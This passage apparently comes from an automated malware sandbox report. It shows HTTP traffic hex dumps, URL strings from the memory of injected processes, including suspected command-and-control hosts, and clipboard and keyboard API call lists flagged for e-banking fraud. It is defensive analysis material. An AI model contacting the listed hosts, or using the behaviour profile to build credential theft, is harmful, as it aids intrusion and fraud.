69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 03 May 2024 18:19:28 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 03 May 2024 18:19:31 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:19:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: ApacheContent-Encoding: gzipData Raw: 32 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 51 74 f1 77 0e 89 0c 70 55 c8 28 c9 cd b1 e3 02 00 00 00 ff ff 0d 0a Data Ascii: 20QtwpU(
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:19:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: ApacheContent-Encoding: gzipData Raw: 32 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 51 74 f1 77 0e 89 0c 70 55 c8 28 c9 cd b1 e3 02 00 00 00 ff ff 0d 0a Data Ascii: 20QtwpU(
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:19:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: ApacheContent-Encoding: gzipData Raw: 32 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 51 74 f1 77 0e 89 0c 70 55 c8 28 c9 cd b1 e3 02 00 00 00 ff ff 0d 0a Data Ascii: 20QtwpU(
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:20:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: ApacheAccept-Ranges: bytesData Raw: 32 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 0a 0a 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 64 61 74 61 2f 74 65 6d 70 6c 61 74 65 73 2f 77 65 62 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 43 4c 49 45 4e 54 20 45 52 52 4f 52 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 4e 4f 54 20 46 4f 55 4e 44 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 20 3c 62 3e 2f 6e 72 75 70 2f 3c 2f 62 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 27e<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Error 404</title><link href="/data/templates/web/static/style.css" rel="stylesheet"> </head><body><div class="error-container"><div class="error-text"><h1>CLIENT ERROR</h1></div><div class="error-text-strong"><h1>404</h1></div><div class="error-text"><h1>NOT FOUND</h1></div></div><div class="error-descr-container"> <p>The request <b>/nrup/</b> was not found on this server.</p></div> </body></html>
Source: mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4524175118.0000000003548000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: finger.exe, 00000004.00000002.4525309723.00000000042E4000.00000004.10000000.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4524175118.0000000003EB4000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://fedoraproject.org/
Source: finger.exe, 00000004.00000002.4525309723.00000000042E4000.00000004.10000000.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4524175118.0000000003EB4000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://nginx.net/
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4526747415.000000000530D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.eh28mf3cdv.xyz
Source: mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4526747415.000000000530D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.eh28mf3cdv.xyz/nrup/
Source: finger.exe, 00000004.00000002.4525309723.000000000479A000.00000004.10000000.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4524175118.000000000436A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.northeastcol0r.com/px.js?ch=1
Source: finger.exe, 00000004.00000002.4525309723.000000000479A000.00000004.10000000.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4524175118.000000000436A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.northeastcol0r.com/px.js?ch=2
Source: finger.exe, 00000004.00000002.4525309723.000000000479A000.00000004.10000000.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4524175118.000000000436A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.northeastcol0r.com/sk-logabpstatus.php?a=S0FsMUJmMDBqRVVraW9HalVKTTBGd05XWXAwRGdyejBQdDZF
Source: finger.exe, 00000004.00000002.4525309723.0000000003B0A000.00000004.10000000.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4524175118.00000000036DA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.searchvity.com/
Source: finger.exe, 00000004.00000002.4525309723.0000000003B0A000.00000004.10000000.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4524175118.00000000036DA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.searchvity.com/?dn=
Source: finger.exe, 00000004.00000002.4527606501.00000000073EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: finger.exe, 00000004.00000003.2500796329.0000000007AFC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: finger.exe, 00000004.00000002.4527606501.00000000073EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: finger.exe, 00000004.00000002.4527606501.00000000073EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: finger.exe, 00000004.00000002.4527606501.00000000073EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: finger.exe, 00000004.00000003.2500796329.0000000007AFC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: finger.exe, 00000004.00000002.4527606501.00000000073EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: finger.exe, 00000004.00000002.4527606501.00000000073EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: finger.exe, 00000004.00000002.4527606501.00000000073EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: finger.exe, 00000004.00000002.4527502751.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000004.00000002.4525309723.0000000004ABE000.00000004.10000000.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4524175118.000000000468E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://gw.alipayobjects.com/zos/rmsportal/KDpgvguMpGfqaHPjicRK.svg
Source: finger.exe, 00000004.00000003.2500796329.0000000007AFC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: finger.exe, 00000004.00000002.4527502751.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000004.00000002.4525309723.0000000004ABE000.00000004.10000000.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4524175118.000000000468E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?41eabc9f6a9d26dcbe950fd13f552516
Source: finger.exe, 00000004.00000002.4527502751.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000004.00000002.4525309723.0000000004ABE000.00000004.10000000.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4524175118.000000000468E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?92670261e24653d39b714ffd838f4d3d
Source: finger.exe, 00000004.00000002.4527502751.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 00000004.00000002.4525309723.0000000004ABE000.00000004.10000000.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4524175118.000000000468E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://img.maskanalyse.com/node/script?appId=mdtv&amp;channel=
Source: finger.exe, 00000004.00000003.2500796329.0000000007AFC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: finger.exe, 00000004.00000002.4522971094.000000000061A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: finger.exe, 00000004.00000003.2444493969.00000000073C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: finger.exe, 00000004.00000002.4522971094.000000000061A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: finger.exe, 00000004.00000002.4522971094.000000000061A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: finger.exe, 00000004.00000002.4522971094.000000000061A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: finger.exe, 00000004.00000002.4522971094.000000000061A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: finger.exe, 00000004.00000002.4522971094.000000000061A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0/
Source: finger.exe, 00000004.00000002.4525309723.000000000492C000.00000004.10000000.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4524175118.00000000044FC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://rtp7winbet.one
Source: finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: finger.exe, 00000004.00000002.4527606501.00000000073EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_003FEAFF
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_003FED6A
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_003FEAFF
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003EAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 0_2_003EAA57
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_00419576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_00419576

E-Banking Fraud

barindex
